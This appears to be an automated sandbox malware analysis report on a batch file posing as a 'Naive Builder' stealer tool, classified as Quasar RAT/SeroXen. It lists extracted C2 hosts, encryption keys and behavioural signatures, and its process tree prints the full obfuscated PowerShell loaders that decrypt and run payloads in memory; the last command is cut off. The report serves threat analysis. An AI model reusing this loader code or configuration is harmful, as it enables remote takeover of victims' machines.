Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
-
submitted
27/03/2025, 18:33
General
-
Target
naive-stealer-main/Naive Builder.bat
-
Size
12.8MB
-
MD5
a2e3e4286e8b22b3b021a6706b899dd7
-
SHA1
e6179204735421c3927f27c13f9751af1dce9bd2
-
SHA256
efd80dd8487437f58413be6e7d2da6ea866ae7626b3225dbf326e8c82c85e580
-
SHA512
3ff5d19accd1fa6765ffc3554bb9cfe3989eee4cf226c2ce7abbaff47a1586253ab1b408f4f9e47611ea7d2415f3298b12dfada1d1987d43c2efa16aac11e3e8
-
SSDEEP
49152:JZHKpAhg6/Ri76PuM0gcqQP+GBRa1SgA+754EU1kOeTUliFDvnrNqjdsusoj8nNc:e
Score
10/10
Malware Config
Extracted
Family
quasar
Version
1.0.0.0
Botnet
v15.6.3 | xen
C2
studies-royal.at.ply.gg:31849
usa-departments.at.ply.gg:37274
category-in.at.ply.gg:42204
Mutex
bd62476d-8a2b-4e05-a8e5-68cc94baac4f
Attributes
-
encryption_key
AA41DD5506DCFCA6EE3BF934CC3C9319F80E5E10
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
5000
-
startup_key
$sxr-seroxen
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 1 IoCs
-
Seroxen family
-
Seroxen, Ser0xen
Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 3 IoCs
-
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
-
Drops file in System32 directory 19 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 54 IoCs
-
Modifies registry class 64 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{db584084-8912-45fc-85d9-b69f9227bf06}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9e7d8dd7-e38d-494a-8418-528626613edb}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7e18738f-e1f3-4e73-917c-45877cb7dfae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8eeefc6f-9ce6-4f5f-af36-446fe0663621}2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{24245e55-e96a-4b0d-9b27-8bd7be238268}2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq=[System.Security.Cryptography.Aes]::Create(); $XURkq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XURkq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XURkq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA='); $XURkq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IIC8RBkY6uF/2e5D1cUgfg=='); $XhpAT=$XURkq.CreateDecryptor(); $return_var=$XhpAT.TransformFinalBlock($luVLu, 0, $luVLu.Length); $XhpAT.Dispose(); $XURkq.Dispose(); $return_var;}function hLEOv($luVLu){ $SBbXV=New-Object System.IO.MemoryStream(,$luVLu); $RlXKT=New-Object System.IO.MemoryStream; $XPinw=New-Object System.IO.Compression.GZipStream($SBbXV, [IO.Compression.CompressionMode]::Decompress); $XPinw.CopyTo($RlXKT); $XPinw.Dispose(); $SBbXV.Dispose(); $RlXKT.Dispose(); $RlXKT.ToArray();}function tzqfR($luVLu,$MCcIJ){ $VEHZu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$luVLu); $cUkGe=$VEHZu.EntryPoint; $cUkGe.Invoke($null, $MCcIJ);}$flgbs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat').Split([Environment]::NewLine);foreach ($zFvRn in $flgbs) { if ($zFvRn.StartsWith(':: ')) { $TRCCB=$zFvRn.Substring(4); break; }}$YrvSK=[string[]]$TRCCB.Split('\');$xplph=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[0])));$vNzEy=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[1])));tzqfR $vNzEy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));tzqfR $xplph (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1816).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] 